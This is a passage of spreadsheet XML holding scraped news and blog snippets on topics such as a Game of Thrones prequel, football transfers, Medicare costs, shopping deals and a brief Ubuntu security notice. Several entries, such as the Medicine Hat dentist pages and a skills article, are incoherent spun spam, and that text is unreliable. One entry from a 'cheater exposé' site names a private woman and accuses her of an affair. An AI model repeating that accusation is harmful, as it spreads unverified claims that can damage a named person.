boats, what looks like the Stark vigil can be seen on the flag. However, the vigil does bear some differences to the one GOT fans have been accustomed to. Some fans have even suggested it looks more like a dragon or panther than the wolf synonymous with Starks. Should the images be legitimate, it could be the first-ever peek into life as an early Stark. WILL GOT STARS RETURN FOR A GAME OF THRONES MOVIE? No Lannisters allowed in the prequel George RR Martin revealed the Lannister family would not feature in Bloodmoon. Martin told Entertainment Weekly that the series would predate the rise of the Lannisters. He said: “The Lannisters aren’t there yet, but Castlery Rock is certainly there; it’s like the Rock of Gibraltar, “It’s actually occupied by the Casterlys — for whom it’s still named after in the time of Game of Thrones.” WHO WILL JOSH WHITEHOUSE PLAY IN GAME OF THRONES PREQUEL? The 7 Kingdom of Westeros? Try 100 Martin also dropped another huge fact about the new series during his interview with EW. The GOT author revealed: “We talk about the Seven Kingdoms of Westeros; there were Seven Kingdoms at the time of Aegon’s Conquest, “But if you go back further then there are nine kingdoms, and 12 kingdoms, “Eventually you get back to where there are 100 kingdoms — petty kingdoms — and that’s the era we’re talking about here.” Who exactly will rule the 100 kingdoms in the series remains unknown, however. Bloodmoon will premiere on HBO at some point in the future. Source link</t>
  </si>
  <si>
    <t>moocher</t>
  </si>
  <si>
    <t>These beauty brands are half price at Woolworths as part of their online only sale. Make-up Maybelline Hair care Essano Garnier Fructis, Olia, Nutrisse Glow Lab L'Oreal Hair Colour</t>
  </si>
  <si>
    <t>Ubuntu Security Notice 4071-2 – USN-4071-1 fixed several vulnerabilities in Patch. This update provides the corresponding update for Ubuntu 14.04 ESM. It was discovered that Patch incorrectly handled certain files. An attacker could possibly use this issue to access sensitive information. Various other issues were also addressed. Published at: July 25, 2019 at 01:01PM View on Packet Storm The post Ubuntu Security Notice USN-4071-2 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Best Dentist In Medicine Hat The Best Dentists in Medicine Hat, AB What is a Dentist? Dr. David Stock Verified Outstanding Staff World Class Punctuality Exceptionally Helpful Highly Knowledgeable. Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Veneers and more. We are looking forward to your visit to our. Viva Vitality: online plastic surgery and information community, is spotlighting the best cosmetic dentists in Los Angeles that rejuvenate. of satisfaction felt by patients with their doctor and the number of. When was the last time the entire top five of the Billboard R&amp;B single charts was dominated by one person. to 8 p.m. The. Best Dentist In Medicine Hat Alberta The Best Dentists in Medicine Hat, AB What is a Dentist? Dr. David Stock Verified Outstanding Staff World Class Punctuality Exceptionally Helpful Highly Knowledgeable. Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Medicine Hat. We’re the original doctor ratings site with over 2 million reviews. Viva Vitality: How dental sealants can Most Popular Dental Clinic Near Medicine Hat company building portions of the Whitla Wind farm near Medicine Hat, as well as another union that recently applied to. “No to Trump in ’20,” June 24 There are shades of conspiracy in the Medicine Hat News publishing such a biased editorial from the. Viewpoint: Medicare for All vs. Obamacare 2.0 – It is about Raabel also received the Kamsack Branch of the Legion award of $500; the first of three Kamsack Dental. one of four. A number. Medicine Hat region recording a sharp increase in unemployment last month Fatal Fire at Coaldale Seniors Apartme. D01616 歐陽傑 香港灣仔天樂里7號1樓A室 DOCTOR OF DENTAL MEDICINE OF THE 1981 AU YEUNG, KIT HERBERT FLAT A, 1/F, 7. Find the best Dentist in Medicine Hat, AB. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local. Transfer news RECAP: All Wednesday’s rumours and done deals in one place – Premiership duo ensured their place in the hat for the third round draw. Transfer Talk Transfer news RECAP: All Thursday’s. For more information please visit employment.alberta/hb-policy or call 1-877-469-5437. Alberta Health Services also offers a free dental screening and fluoride for children ages 12 to 35 months. Contact the team at River Dental in Medicine Hat, Alberta is always here to help. Excuse Us While We Improve Your Experience: River Dental will be closed from July 28 to Aug 6 for renovations; however we will be available for urgent requests and to schedule. “Our number one principle is public money must be spent for public benefit,” Mayor Naheed Nenshi said. “As long as what is. Friday 1 February 2019 Weather MyGovHK: Login Register Text Size 繁 简 Other languages India – ह न द Indonesia – Bahasa Indonesia Nepal – न प ल. A Medicine Hat. cost of one less pastor for the sick and suffering &amp; less help for those who need it most in our.</t>
  </si>
  <si>
    <t>altomic</t>
  </si>
  <si>
    <t>up to 30% off groupon travel discount code. examples of actual savings. only checked these 3 so unsure of which deal actual gives 30% off (or even more than 10% off) 11-Day Classic China Tour, Melbourne or Sydney Flights, One Person, Twin Share - Holiday Xperience- $777 —&gt; $738_ =5% off (you need to organise your own visa) Sunlover Moore Reef Day Tours Family Ticket -Two Adults and Two Children - $486.00 —&gt; $447 - 8% off Silverwater Resort-Phillip Island 2 nights - 2 people from $189 —&gt; $177 =7% off.</t>
  </si>
  <si>
    <t>He’s past 30, his production has suffered this past season, he lacks the explosiveness of his best campaigns and there are questions about his durability. Source: Sports Business News</t>
  </si>
  <si>
    <t>Aaron Bunch</t>
  </si>
  <si>
    <t>In a desperate bid to save money at Clive Palmer's cash-strapped Queensland Nickel refinery, management purged safety staff, a court has been told.</t>
  </si>
  <si>
    <t>NEIL ARMSTRONG had a cheeky retort up his sleeve when Apollo 11’s mission to land on the Moon was compared to Christopher Columbus’ ‘discovery’ of the Americas, a documentary has revealed. The post Moon landing: Neil Armstrong’s cheeky retort to Columbus comparison revealed appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>For Part B — doctor’s visits and outpatient care — premiums are based on income. The standard premium this year is $135.50 a month, but financial help is available for people with low incomes who don’t qualify for Medicaid, the government health program for the poor, which covers just about everything. Richer Medicare beneficiaries — individuals with annual incomes over $500,000 — pay $460.50 a month. Premiums are typically deducted from people’s Social Security checks. Part B also has a deductible of $185 a year, and co-payments of 20 percent after you reach your deductible. Many people buy supplemental “Medigap” insurance to cover Medicare’s out-of-pocket costs. Unlike Affordable Care Act plans, Medicare has no cap on out-of-pocket spending, so the cost can climb quite high for sick people. An analysis by the nonpartisan Kaiser Family Foundation found that Medicare enrollees in fair or poor health spent an average of $6,128 in 2013, or 47 percent of average Social Security income. Prescription drug costs can also be high in Medicare, and they represent one of the most complex, confusing parts of the program. Medicare Part D plans are run by private insurers, and the premiums cost $40 a month on average this year, according to Kaiser. There are also annual deductibles before coverage kicks in — they are capped at $415 this year, — plus co-payments and coinsurance. But if your income is low enough, you may qualify for extra help paying for drugs, and in some cases, owe no premiums or out-of-pocket costs. Then, there is the dreaded “doughnut hole” — a gap in which the Medicare drug plans don’t pay for patients’ medications after they have spent a certain amount — this year, $3,820. At that point, enrollees have to pay 25 percent of the cost of brand-name drugs, and 37 percent of the cost of generic drugs, until their total out-of-pocket spending has reached $5,100. Once they hit that, they qualify for “catastrophic coverage,” and only pay a small co-payment for covered drugs for the rest of the year. Kaiser recently found that one million Medicare beneficiaries had out-of-pocket spending above the catastrophic threshold in 2017, averaging $3,214. What is Medicare Advantage? Medicare Advantage is an increasingly popular alternative to traditional Medicare. Advantage plans are offered by private insurers that have contracts with Medicare. These plans have all the same benefits as traditional Medicare, and often more, such as dental care or health club memberships. Co-pays and deductibles vary depending on the plan. Unlike traditional Medicare, all Medicare Advantage plans have limits — $6,700 this year in most cases — on out-of-pocket spending. Source link</t>
  </si>
  <si>
    <t>Verteran director recently suggested he may be at the ‘end of the road’ with feature films See full article at Independent.co.uk » The post Quentin Tarantino curates Spotify playlist of his favourite songs from Pulp Fiction, Kill Bill and more appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>U.S. FedEx Corp on Friday again apologized and blamed Washington's ban on Huawei for being "unclear" as Beijing deepened an investigation into why the delivery firm was holding up packages meant for the telecoms equipment maker.</t>
  </si>
  <si>
    <t>“Local residents who called triple-zero last night have told me that they heard a number of shots that lasted around a minute."</t>
  </si>
  <si>
    <t>English Gaelic Hangman game – select either to guess the English or the Gaelic word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading English Gaelic Hangman →</t>
  </si>
  <si>
    <t>Under $10 deal 1. https://www.fangear.com/afl/grouping-element/price/AFL-Team-... https://www.fangear.com/soccer/grouping-element/shop-by-pric... https://www.fangear.com/rugby-league/grouping-element/produc... and more at Fangear while stocks last (+$5 Shipped if spend under $120).</t>
  </si>
  <si>
    <t>Things You Should Know About How to Enhance Your Skills For you to continue working outside the system, you’ve got to choose the responsibility now to learn or boost your skills, especially in technology, that will let you continue to make value. If you wish to maintain your job’s success and boost your professional development, it is important that you acquire new knowledge and abilities. For instance, if you’re a diploma holder in marketing who would like a work promotion, you can occupy a post diploma course in marketing to better your abilities and knowledge. You shouldn’t need to be a computer expert in order to utilise the programme. The features of management training It is necessary to avail the assistance of a trusted training provider in order to invest your time in the most suitable spot. When you take part in good training, not only do you learn decent expertise, you also get to fulfill like-minded friends that are hard to find. If so, then all you will need is the very best training from experts. It’s good that you search around the web to learn and increase your abilities and hopefully it https://www.dkfa.de/en/ increases your opportunity to locate a good find buried under the ground. Though your schedule may not allow for a true campus experience, the chance to use the web to get the skills you will need to construct a new perspective can do some incredible things for you in your life. There are on-line proofing tools available on the internet that are used by different industries. If you’re drawn to restaurant refrigeration then try to develop into a specialist at it. You are going to have access to a selection of resources that you’re able to utilize to learn plenty of information regarding the market, trends, together with tips and techniques. Whatever you see in a web site is due to the mix of HTML and CSS. Short post-diploma courses offer you flexible timings. Since there are countless of on-line piano programs an individual interested may access, it can help to read some Rocket Piano Reviews before creating your final selection of piano class. How to Choose How to Enhance Your Skills It is essential to pursue the course based on your interest. There are not many straightforward rules to make certain you are branding yourself and being true to that brand. Getting ready to produce a bid by a tender response can at times be overwhelming. Accordingly, it’s all-important to take any chance to acquire extra-curricular experience. If you believe that you are having all the skills, after which you can certainly join a football group, otherwise it would be very difficult for you to join any teams. Specially if you’re new at your work and lack experience. You’re going to be exposed to several principles, concepts, implementation techniques, and many more. You receive the flexibility to select the form of assignments also. As a way to acquire more engagement, you must create a more engaging content. You ought to be passionate about what you’re doing in order to totally concentrate on the task given and not get tired of it. For this reason, you must look to improve or enhance low self esteem and it ought to be enhanced in such a manner that it your self esteem may give you great advantages. If you think that it’s somewhat complicated to draft your resume, you need to opt for expert help. To be able to do something well, you must love what you’re doing. You are going to be watching Sass files automatically for any new adjustments and exporting in actual moment. You ought to be in a position to define problems in order to discover solutions. Introducing How to Enhance Your Skills On-line diaries are lots safer than physical ones. As you don’t have a great deal of money, you ought to pay attention to learning. You may even find nothing after attempting to dig a number of region of land. As soon as you have gotten an idea on getting the job which you want, it’s time to take action. To begin with, let’s take a peek at the beginning of the guide. Also, it’s one of the things which brings people close from various cultures, and is an enjoyable activity too. How to Enhance Your Skills – the Story The author should take note of it or not like that, however it’s possible to buy a premium quality document. Reading through blog posts can be a fantastic approach to find out more about a particular interest of yours. If you wish to boost your writing skills, writing on a normal basis is not only going to diminish your fear of the blank page (or blinking cursor), it’s also going to help you build a distinctive style. If you are searching for a guide on how best to enhance your Microsoft Excel skills, you’ve landed on the correct page. The article has to be perfect with respect to each facet. Make certain that you have extensive discussions about the document before it’s drafted.</t>
  </si>
  <si>
    <t>OPINION Before the arrival of Steve Bruce, Newcastle United were the only club not to have made a signing in the Premier League. A point that is made even worse when you consider that after the departure of Rafael Benitez, the Magpies were in desperate need of reinforcements. The club-record signing of Joelinton has been followed by the double signing of keeper Jake Turner and midfielder Kyle... Source</t>
  </si>
  <si>
    <t>Fraudsters were asking for donations for the Osoyoos High School Healthy Kids Program.</t>
  </si>
  <si>
    <t>▶️ AREA 51 Theme Song (PedroDJDaddy Trap Remix 2019)🎵 Click that 🔔 to turn on notifications! DO NOT MISS AN UPLOAD! 🔽 Download this Song d(^_^)b 🔽 🎶 Exclusive Drop the Bassline Playlists 🎶 🔸 Memes &amp; Themes: http://bit.ly/Memes-Themes 🔸 Trap: http://bit.ly/DTBTrap 🔸 Dubstep: http://bit.ly/DTBDubstep 🔸 Future Bass: http://bit.ly/DTBFuture 🔸 Electro House: http://bit.ly/DTBElectro 🔸 EDM: […] The post AREA 51 Theme Song (PedroDJDaddy Trap Remix 2019) appeared first on Dubster.</t>
  </si>
  <si>
    <t>Here we go. Again. A summer that promised so much has delivered us the square root of diddly squat. From what seemed at one point likely to be a Dubai-based takeover with Rafa Benitez given a new contract and a transfer kitty that would bring Kylian Mbappe to Tyneside, has moved on to us losing Rafa, selling Perez, not buying Rondon and ending up with the former mackem boss who had to resign from Sheffield Wednesday because our tight-fisted owner wouldn’t give them the full compensation they asked for. At the time of writing, it’s still to be decided what legal action Bruce’s former employers will take on his new ones. But the phrase “hope you take them to the cleaners” was uttered more in the NE1 region on Wednesday than when the sheets are changed after a night in the Love Island villa. Yes, Steve Bruce is our new manager. Well, ‘head coach’ if we’re getting technical. Mike Ashley and Lee Charnley decided that a manager who has won every trophy going in club football shouldn’t be given the keys to St James’ and replaced him at the 11th hour (or 11th listed name if rumours are to be believed) with a man who has never won a trophy in his managerial career. I guess you could say he’s the perfect match for Ashley and co as he will continue that losing streak over the next three years of his contract. With takeover talk falling flat as quickly as Boris Johnson’s latest kipper-based gag, the reality of the 2019–20 season looks set in stone. Bruce will be in charge of our latest journey to finish 17th in the Premier League — and will earn a few extra quid on top of his zero-hours contract if he manages to do it. With #BoycottArsenal already on fan’s agendas and season tickets sales at least 12,000 less than last season, it seems this news hasn’t exactly been met with universal acceptance. Good. The more of that the better. It’s really about time we made a stand against our retail hoarder of an owner that makes us suitably depressed every time he makes another fine mess. A quick scan at the Premier League relegation odds since the end of last season tells its own tale. With Rafa seemingly likely to continue his Newcastle love affair, we were only around 5/1 for the drop this season. Now, it’s as short as 6/4. More money has gone on NUFC to be relegated than any other club over the past week. Is that a fair reflection on the state of the club going into the new season? Probably. However, I’m going to be honest and say that I actually don’t think we’ll be relegated this season. Yes, we have an incompetent manager that has only been employed because he; a) is a ‘Geordie’, b) was wanting the job, c) would put up with Ashley, Charnley and co and d) is a ‘Geordie’. If I had a pound for every time I’ve heard the word ‘local’ mentioned in the press (and particularly by Shola “Loan Coordinator” Ameobi on Sky) this week, I could probably rival the BZG bid for the club. Yes, we have lost two very important players in Perez and Rondon. We also need to replace players like Diame and Kenedy too. Plus there’s every chance that the likes of Longstaff, Dubravka, Schar and others might be tempted to move on too. Yes, the atmosphere around the club is in its seemingly usual poisonous state with fan unrest, season tickets not being renewed, boycotts planned and other protests in the works. But, despite all that…I actually think we’ll meet the targets set by those in charge come May. We’ll make our customary early exits from the FA Cup and whatever random company is sponsoring the Worthington Cup these days. Tick. We’ll make a good profit from telly money and other finances that will make us North East Balance Sheet Champions for the umpteenth season in a row. Tick. We’ll also even win the odd game or two and finish in that position of the league that Mike loves. Somewhere between 11th and 17th. Our squad, albeit bare and lacking quality in-depth, is good in defence — for the first time in years — and parts of the midfield. We have a settled back three if Steve “I don’t do tactics’ Bruce decides to stick with what worked last season. We have Longstaff, Shelvey and, if he stays, Hayden in the centre of the park who can work their socks off to win the ball back and start effective counters. We have Almiron who looked electrifying in the Copa America and will be keen to showcase his talents more in order to win the Santiago Munez move to Real Madrid. If Bruce can bring in the two strikers he’s promised (with Joelinton seemingly very close), alongside a winger, central midfielder, right wing-back to compliment Ritchie on the left side and someone who can lift the bums off seats, for those who just can’t quite peel themselves away, then we’ll probably be good enough to reach the promised land of Premier League football once again. A lot of that depends on those deals getting over a line that only ever seems to be mentioned in relation in incomings at SJP for some bizarre reason. But surely, SURELY Ashley isn’t going to not bring in a single player come August 8th?! Right??! In summary, some quick questions and answers: Do I want Steve Bruce as Newcastle United boss? No. Do I wish Rafa was still here? Yes. Will I be attending St James’ Park again whilst Ashley is still in charge? No. Will I give Bruce a chance? Yes, although if/when things don’t go right, remember it’s not all his fault. Is there really only one person who we need to direct our disgust and fury at until he finally sells the club we love? Fucking yes. Steve Bruce won’t be dealt a great set of cards but if he plays them right his Ashley bonus will be all the sweeter. Higher than a Rafa finish? Don’t bank on it. (Fancy writing for us? Send any articles/ideas over to us at NUFCblogsubmissions@gmail.com &amp; we’ll get back to you!)</t>
  </si>
  <si>
    <t>Liverpool target Nicolas Pepe has opted to join Arsenal on a five-year contract in a deal that will be worth around £81m</t>
  </si>
  <si>
    <t>Candice Prosser</t>
  </si>
  <si>
    <t>A woman accused of deliberately poisoning her partner with a cocktail of dangerous medications talked to family members about inheriting his money on the day he was found dead, a court is told.</t>
  </si>
  <si>
    <t>So far, this is imploding on the Democrats. “This has been a disaster for the Democrats. And I think it’s been a disaster for the reputation of Bob Mueller.” – Fox News’ Chris Wallace pic.twitter.com/M9Tx8Yiaje — Ronna McDaniel (@GOPChairwoman) July 24, 2019 Bob Mueller is struggling. It strikes me as a health issue. We need […]</t>
  </si>
  <si>
    <t>As Disney’s 1994 The Lion King remake banks its first $ 1 billion, becoming the fifth highest-grossing film of 2019, it has been reported that the entertainment company is looking to bring in one of its main voice actors, Beyonce, to make more projects in the future, reported The Daily Mail. The singer starred in the film as Nala, alongside other famous names, including Donald Glover as Simba, James Earl Jones as Mufasa, Chiwetel Ejiofor as Scar, and Seth Rogen as Pumbaa. According to an insider report given to publication The Sun, “Beyonce’s deal with Disney for The Lion King was one of the biggest it has done to date. Now they want to expand it by giving her free reign to create her own movies under the Disney umbrella.” Click here to continue and read more… The Inquisitr</t>
  </si>
  <si>
    <t>WA's building watchdog has fined a Queens Park developer $5000 for negligence after the company hired an unregistered builder to renovate a Fremantle chocolate shop.</t>
  </si>
  <si>
    <t>The Parramatta Eels are literally part of the bricks and mortar at the Westmead Ronald McDonald House.</t>
  </si>
  <si>
    <t>Two years ago, Satish P., a bakery owner in the small village of Harohalli near Bengaluru, had his doubts about stocking Mondelez's Cadbury Silk bars.</t>
  </si>
  <si>
    <t>North Melbourne has already interviewed caretaker coach Rhyce Shaw for the senior coaching position for which he is a clear frontrunner.</t>
  </si>
  <si>
    <t>Arabic Albanian Dictionary – travel dictionary to translate Arabic to Albanian. Click on the list to show Arabic or Albanian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Arabic Albanian Dictionary →</t>
  </si>
  <si>
    <t>Park Meadows Dental – 1854 Southview Dr SE Suite 101, Medicine Hat, Alberta T1A 8L9 – Rated 4.3 based on 17 Reviews "Amazing service and people were. Jump to Sections of this page. SouthSide Dental – Medicine Hat dental services SouthSide Dental – Medicine Hat dental services Admin Home About Services Sedation &amp; Anesthesia Crowns Dental Implants Dental Service-Fillings Exams Hygiene Nitrous Oxide. Number 1 Dentist Near Medicine Hat Alberta 2 reviews of Southside Dental "Dr Whitzke is the most knowledgable dentist in Medicine Hat! We had terrible experiences at other offices in the city. He is friendly and treats his patients with respect. How wonderful. We are so happy our clients. Muscle Powered Thursday Morning Hike, July 25 at Tahoe Rim Trail – Hat Number 1 Dental Clinic Near Medicine Hat Alberta Number 1 Dentist Near Medicine Hat Alberta 2 reviews of Southside Dental "Dr Whitzke is the most knowledgable dentist in Medicine Hat! We had terrible experiences at other offices in the city. He is friendly and treats his patients with respect. How wonderful. We are so happy our clients. Muscle Powered Thursday Morning Hike, July 100-1424 Southview Dr SE, Medicine Hat, AB T1B 4E7 Schedule an Appointment The Denturist Victor Vandor, D.D. Hours Monday to Thursday – 9 AM to 5 PM Friday to Sunday – CLOSED The Innovative Dental Procedure Helping Thousands Replace Their.</t>
  </si>
  <si>
    <t>The Detroit Pistons addressed their depth concerns this summer, but that may not be enough to overcome the shaky health history of three of their biggest contributors. Source: Sports Business News</t>
  </si>
  <si>
    <t>Police drop trespass charges against prominent French journalist Hugo Clement and his film crew, following their arrest while filming anti-Adani protesters at Abbot Point earlier this week.</t>
  </si>
  <si>
    <t>Birmingham City Complete Signing Of Jake Clarke-Salter CESENA, ITALY – JUNE 18: Jake Clarke-Salter of England controls the ball during the 2019 UEFA U-21 Championship Group C match between England and France at Dino Manuzzi Stadium on June 18, 2019 in Cesena, Italy. (Photo by TF-Images/Getty Images) Birmingham City have signed England Under-21 captain Jake Clarke-Salter on a season-long loan deal from Chelsea. Jake Clarke-Salter Makes Birmingham City Loan Move OFFICIAL: Blues have signed Jake Clarke-Salter on a season loan from @ChelseaFC. The Club beat off significant competition for the @England Under-21s Captain. Full details https://t.co/QJ8sNXWEC6#WelcomeJake #BCFC pic.twitter.com/lPjaykRQNH — Birmingham City FC (@BCFC) July 24, 2019 Highly Sought After Defender Birmingham City fought off significant competition from Leeds United and Swansea City to land the England youth skipper. The 21-year-old enjoyed a successful loan spell at Vitesse Arnhem last term, impressing along with fellow new Blues signing Dan Crowley in the Eredivisie. Clarke-Salter is eligible to appear for the Blues in both the Sky Bet Championship and Emirates FA Cup. From non-league Carshalton, Clarke-Salter joined Chelsea’s Academy aged nine and progressed through the ranks in rapid succession. He made his Premier League debut in a 4-0 win at Aston Villa aged just eighteen. The talented central defender has a plethora of youth honours attributed to his name. Clarke-Salter has lifted two UEFA Youth League titles with Chelsea, three FA Youth Cups and was part of the England squad that won the Under-20 World Cup in South Korea in 2017. Clarke-Salter was loaned to Bristol Rovers for the 2016-17 season but suffered a fractured arm. He appeared for Chelsea in the EFL Cup in September 2017 before heading out on loan to Sunderland in January. Clarke-Salter had held talks with Steven Gerrard at the Toulon Tournament regarding a move to Rangers; however, the defender instead chose to move to Holland and Vitesse for the 2018-19 campaign. The 21-year-old was named England Under-21 captain for the European Championship in Italy in June; however, the tournament was not as successful as planned for Aidy Boothroyd’s side. At 6ft 1in, Clarke-Salter is a daunting figure that will provide competition for a starting position in Pep Clotet’s side. This post Birmingham City Complete Signing Of Jake Clarke-Salter appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Jamie Lee Robinson. Was sneaking around with my husband while I was pregnant. 4 months earlier I had lost a full term baby boy. While they were secretly meeting I lost our 4th baby and had to have surgery. The night after surgery he went to her home and spent the whole weekend there leaving me alone with our other children and no one to care for me while I recovered only hours after surgery. He came home with a hickie on his neck from her. We still are not divorced and news around his warehouse is that she is pregnant. It’s only been 5 months since I lost our 4th and not even a year since I lost our full term boy. Neither one sees anything wrong with their actions. Moral lacking wastes of space and air. The post Jamie Lee Robinson – Expose Homewreckers appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>This video shows one of the most beautiful Island of Venice, Murano Island. Video is showing exactly as tourists would experience if visiting the same. The video is produced by The Tourism School. Narration is given by Head Trainer Mayank Narang The post VENICE TRAVEL GUIDE – ITALY TRAVEL GUIDE THE TOURISM SCHOOL appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>purecase3d</t>
  </si>
  <si>
    <t>As described on Ebay: ✔ EARPHONE MICROPHONE 2-IN-1: Leading design, lavalier lapel microphone and headphone -the two functions only need one purchase. ✔ FULLY COMPATIBLE: with 2 adapters can connect to nearly any machines such as Apple devices, Android devices, voice recorder, voice amplifier, desktops, laptop, tablet, Mac, video camera and so on. ✔ GREAT VERSATILITY: Perfect for Facebook, Whatsapp, QQ, MSN, SKYPE internet chat, podcast, singing, speech, recording or more. Perfect for listening to music/podcasts. ✔ HANDS FREE: with Mini and portable size, sleek and compact design, simply plug in and play ,so you will be able to record the best sound possible. ✔ CABLE LENGTH: Approx 78"/200cm. We designed it small so it will be easy to carry with you anywhere you want. Why choose AGPTEK Lavalier Lapel Microphone, Earphone Microphone 2-IN-1. 1.For iPhone smartphones and computers: you can hear your voice and accompaniment from the earphone while speaking/singing and in the replay 2.For Android smartphones: you can only hear your voice and accompaniment in the replay , that means you will only hear accompaniment from the earphone 3. For computers: if you are singing songs with the 2-in-1 adapter, you will hear your voice and accompaniment from the earphone; but if you are chatting, you will only hear the voice on the other end (instead of yours). 4.This 2-in-1 adapter is a whole part and the two male ports are not allowed to be separated into two parts. specification: weight: 0.88oz material: metal + plastic type of plug: 3.5 mm standard type of microphone:condenser (electret) disturbing: omni directional frequency response: 20hz - 16khz distance of the recording: 2m size of the earpiece, 23mm impedance: 16 sensitivity: 108db±3db frequency response: 15hz - 20khz package includes: 1 * Agptek mini microphone clip headset 2 * Adapters 2 * Tweezers 1 * Sponge of microphone 1 * PU bag</t>
  </si>
  <si>
    <t>Melissa Cunningham</t>
  </si>
  <si>
    <t>Former SeaChange actor Tom Long was on the brink of death when he boarded a flight to the United States in April to take part in a medical trial for terminal blood cancer.</t>
  </si>
  <si>
    <t>Dan Sullivan</t>
  </si>
  <si>
    <t>by Dan Sullivan A police vehicle had been stationed blocking the street where Heather Heyer was killed. The officer was told to relocate. It wasn’t clear to the officer how to respond, so the vehicle was moved. Nothing seemed clear that day. Maybe Terry McAuliffe has explained the failures to lead. Or not. It is easy to take a stand against white nationalism. Less simple is any effort to explain what happened and failed to happen on the ground during the day of August 12, 2017. Beyond Charlottesville? Not quite yet. A Charlottesville City Council member at the time expresses the collective outrage of the officials who suffered the indecisiveness and lack of leadership demonstrated during the run up to and during the events tragically culminating in death and injury. Virginia is a Dillon rule state. The ball was undeniably in the Governor’s court. Now he’s reaching for a mulligan. Terry McAuliffe’s book tour kicked off in New York yesterday, not Charlottesville. It will be interesting to compare and contrast the details. He makes appeals for the Heather Heyer Foundation and the Virginia State Police Association. There is no mention of the benefactor of the profits from the book.</t>
  </si>
  <si>
    <t>Peta Doherty And Simon Lauder</t>
  </si>
  <si>
    <t>John Barilaro says community benefits far outweighed NSW treasury analysis that found $16 million in grants to an education provider was "unlikely" to provide value to the taxpayer.</t>
  </si>
  <si>
    <t>Arsenal's talks with Celtic over a deal to sign Kieran Tierney are 'progressing' while we're set to table a significantly higher offer for Wilfried Zaha</t>
  </si>
  <si>
    <t>Meet Pua‘a, the pig. Hawaiʻi’s friendly, bold adventurer discoveryouraloha.expedia.com The post Pua‘a | Animal Guide| Hawaiʻi | Expedia appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>TORONTO — Lucky Whitehead, Andrew Harris and William Stanback are the most popular players in TSN CFL Fantasy presented by LeoVegas this week. But while most Fantasy users are turning to Bombers quarterback Matt Nichols, the CFL Fantasy Podcast hosts have found common ground with a different quarterback. Set your lineup in TSN CFL Fantasy today! CFL Fantasy Podcast trio Steinberg, Nordman and Jeff Krever pick their rosters for Week 8. RELATED » Fantasy Weekly: Lineup tools for Week 8 » DailyRoto: Week 8 Fantasy Projections » Week 8 Fantasy locks and bargains Think you can do better? Play along and compete with them and the rest of the world in the CFL Fantasy Podcast league, and remember to tune in every week for the latest news, debate, lineup locks and bargain buys. TSN CFL Fantasy is back for 2019! Sign up for your chance to win a Grey Cup package valued at $5,000! (Click here for contest terms and conditions). CFL Fantasy Podcast Week 8 lineups STEINBERG NORDMAN KREVER QB Vernon Adams Jr. ($7,359) Vernon Adams Jr. ($7,359) Vernon Adams Jr. ($7,359) RB Andrew Harris ($11,070) Andrew Harris ($11,070) Andrew Harris ($11,070) RB John Crockett ($4,500) John Crockett ($4,500) William Stanback ($8,879) WR Cory Watson ($3,414) Lucky Whitehead ($4,752) Quan Bray ($3,674) WR Chris Matthews ($3,806) Jake Wieneke ($2,500) Kenny Lawler ($2,500) FLEX B.J. Cunningham ($6,380) Quan Bray ($3,674) Branden Burks ($2,640) DEF Montreal Alouettes ($3,200) Winnipeg Blue Bombers ($5,368) Montreal Alouettes ($3,200) Fan Poll Who has the better lineup for Week 8? Pat Steinberg Vote Hannah Nordman Vote Jeff Krever Vote Submit View Poll Results</t>
  </si>
  <si>
    <t>Consumer Credit Counseling Service | (888) 551-1270 Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Car Repossessions and Wage Garnishment solutions, Debt Management. Hillsboro, Oregon Consumer Credit Counseling Service | (888) 551-1270 Saturday 27 July 2019 02:57 AM UTC-05 | Tags: hillsboro-oregon-consumer-credit-counseling-service-888-551-1270 https://youtu.be/Bv58VvxZ360 Hillsboro, Oregon Free Consumer Credit Counseling Service call (888) 551-1270 Credit Repair, Bankruptcy Counseling, Foreclosure Prevention, Student Loan Debt Consolidation, Wage Garnishment and Vehicle Repossession solutions, Mortgage Loan Modification, and Debt Settlement through chapter 13. Hillsboro, Oregon Credit counseling (888) 551-1270 starts with the parent and may include intermediaries later in life empowered by the individual debtor to act on their behalf to negotiate with creditors and resolve debt that is beyond a debtor's ability to pay. Credit counseling is a generic name and is not a brand name owned or controlled by any agency or company. Hillsboro, Oregon Consumer credit counseling services (888) 551-1270 are provided by attorneys, accountants, finance and tax professionals, for-profit, and non-profit credit counseling companies. Regulations on credit counseling and credit counseling agencies varies by country and sometimes within regions of the countries themselves. In Hillsboro, Oregon individuals filing Chapter 13 bankruptcy are required to receive counseling from a designated credit counseling agency. https://www.youtube.com/channel/UCxYQ8mN8hh7nfDFkGi3E_2w/about https://t.co/JqMKB0967s — Texas Consumer Credit Counseling Service (@GeneroSebastian) July 17, 2019 https://twitter.com/GeneroSebastian/status/1151304172978917376 Tags: hillsboro-oregon-consumer-credit-counseling-service-888-551-1270</t>
  </si>
  <si>
    <t>Harriet Alexander</t>
  </si>
  <si>
    <t>Less than a decade after Sydney's two children's hospitals were brought under the same administration, the rivalry between them is more bitter than ever.</t>
  </si>
  <si>
    <t>Rizal Park walking tour &amp; Underpass Update! July 27, 2019.. Travel Vlog, Tour Sightseeing.. The post Rizal Park walking tour &amp; Underpass Update! July 27, 2019.. Travel Vlog, Tour Sightseeing.. appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>The post Just the two of us appeared first on Sell Me Something. Source link</t>
  </si>
  <si>
